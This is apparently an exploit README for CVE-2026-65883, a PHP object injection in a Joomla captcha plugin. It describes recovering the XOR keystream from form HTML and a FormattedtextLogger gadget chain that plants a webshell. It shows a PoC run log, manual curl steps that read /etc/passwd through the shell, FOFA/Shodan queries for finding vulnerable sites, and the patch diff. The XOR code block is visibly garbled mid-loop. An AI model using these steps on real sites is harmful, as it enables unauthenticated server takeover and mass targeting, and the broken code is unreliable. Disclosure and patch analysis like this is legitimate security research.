Share
## https://sploitus.com/exploit?id=926B6750-AD99-58F9-BB1A-D9503A5AD5B7
CVE-2026-65883 β€” Aimy Captcha-Less Form Guard 
clfgd Field β†’ XOR Recovery β†’ unserialize() β†’ FormattedtextLogger β†’ RCE

---

## Overview

Unauthenticated PHP Object Injection in Aimy Captcha-Less Form Guard for Joomla. The `onCheckAnswer()` method base64-decodes the attacker-controlled `clfgd` POST field, runs it through a repeating-key XOR, and passes the result directly to `unserialize()` β€” with **no HMAC, no allowed_classes restriction, and no integrity check**.

| Field | Detail |
|-------|--------|
| **CVE** | CVE-2026-65883 |
| **Product** | Aimy Captcha-Less Form Guard (Joomla plugin) |
| **CVSS 4.0** | **10.0 (Critical)** |
| **Type** | CWE-502 β€” Deserialization of Untrusted Data |
| **Affected** | 18.0 β€” 20.0 |
| **Patched** | 20.1 (July 29, 2026) |
| **Discovered** | Valentin Lobstein (Chocapikk) / VulnCheck β€” July 26, 2026 |

---

## Affected Versions

| Status | Version |
|--------|---------|
| **Vulnerable** | 18.0 β€” 20.0 |
| **Patched** | 20.1 (July 29, 2026) |

---

## Vulnerability Mechanism

### Root Cause

The `onCheckAnswer()` method in `plg_captcha_aimycaptchalessformguard` passes attacker-controlled input directly to `unserialize()`:

```php
// onCheckAnswer() β€” pre-20.1
$cld = false;
if (($clfgd = $input->get('clfgd', '', 'RAW'))) {
    $cld = @unserialize(
        XorHelper::crypt( base64_decode($clfgd), self::getXorKey() )
    );
}
```

The XOR "encryption" is a Vigenère cipher with a per-session key — no authentication, only obfuscation.

### The Broken Encryption

```php
// XorHelper::crypt() β€” repeating-key XOR, period 231
static public function crypt($bytes, $key) {
    $ekey = str_split(self::getHashedKey($key));  // sha512.sha256.sha1 = 232 hex
    $s    = str_split(strVal($bytes));
    $klen = count($ekey);
    for ($i = 0; $i trap_ids = array($id, $trap_id);      // readable from HTML
$cld->mt       = time() + 7;                 // known (server time + 7s)
$html .= '';
```

Since both `trap_ids` (extractable from the `` and honeypot input) and the ciphertext are in the HTML, XOR-ing them recovers ~94 bytes of the 231-byte keystream.

### Attack Flow

1. **GET** any captcha-protected form (registration, login, contact, password reset)
2. **Extract** `clfgd` ciphertext + `trap_ids` + timing β†’ recover 94 bytes of keystream
3. **Align** a `FormattedtextLogger` serialized object so structural bytes fall on known keystream positions
4. **POST** crafted `clfgd` β†’ `unserialize()` β†’ `__destruct()` β†’ `formatLine()` β†’ writes PHP webshell
5. **GET** `/random.php?c=id` β†’ **RCE as www-data**

---

## Proof of Concept

### Single Target

```
$ python cve_2026_65883.py -t target.com

  Target      : target.com
  Status      : Aimy Captcha-Less Form Guard v20.0
  Form        : /index.php?option=com_users&view=registration
  Keystream   : 94 bytes recovered
  Shell       : a1b2c3d4e5.php
  Gadget      : 1460 bytes
  POST        : HTTP 303
  Shell URL   : https://target.com/a1b2c3d4e5.php
  RCE         : CONFIRMED!

RCE ACHIEVED!
  https://target.com/a1b2c3d4e5.php?c=id
```

### Manual Exploitation

```bash
# Step 1 β€” Get form + recover keystream
curl -sk "https://target.com/index.php?option=com_users&view=registration" \
  | grep -oP 'clfgd" value="\K[^"]+' | base64 -d > /tmp/ct.bin

# Step 2 β€” Build FormattedtextLogger gadget + XOR encrypt
python cve_2026_65883.py -t target.com -c "id"

# Step 3 β€” Access webshell
curl -sk "https://target.com/a1b2c3d4e5.php?c=cat+/etc/passwd"
```

---

## FOFA / Shodan

```bash
# Aimy Captcha hidden field
body="clfgd" && body="Joomla"

# Plugin version disclosure
body="aimycaptchalessformguard"

# Shodan
http.html:"clfgd" http.component:"Joomla"
```

---

## The Fix (20.1)

```php
// 20.0 (vulnerable)
$cld = @unserialize( XorHelper::crypt( base64_decode($clfgd), self::getXorKey() ) );

// 20.1 (fixed)
$cld = @json_decode( XorHelper::crypt( base64_decode($clfgd), self::getXorKey() ) );
```

`json_decode()` cannot instantiate PHP objects β€” the POP gadget chain is severed.

---

## Impact

- **Full RCE** β€” execute arbitrary commands as www-data
- **No authentication required** β€” any public form with captcha is a vector
- **Joomla 3.9–5.2.1** β€” FormattedtextLogger gadget works across all versions
- **Persistent** β€” webshell remains until manually deleted

---

## Disclaimer

> This tool is for educational and authorized security testing only. Use against systems you own or have explicit permission to test.

---

## References

| Resource | Link |
|----------|------|
| VulnCheck Blog | [vulncheck.com/blog/aimy-captcha-less-form-guard-object-injection](https://www.vulncheck.com/blog/aimy-captcha-less-form-guard-object-injection) |
| IONIX Threat Center | [ionix.io/threat-center/cve-2026-65883](https://www.ionix.io/threat-center/cve-2026-65883/) |
| CVE Record | [cve.org/CVERecord?id=CVE-2026-65883](https://vulners.com/cve/CVE-2026-65883) |
| NVD | [nvd.nist.gov/vuln/detail/CVE-2026-65883](https://nvd.nist.gov/vuln/detail/CVE-2026-65883) |

---


  Not affiliated with Aimy Extensions or VulnCheck.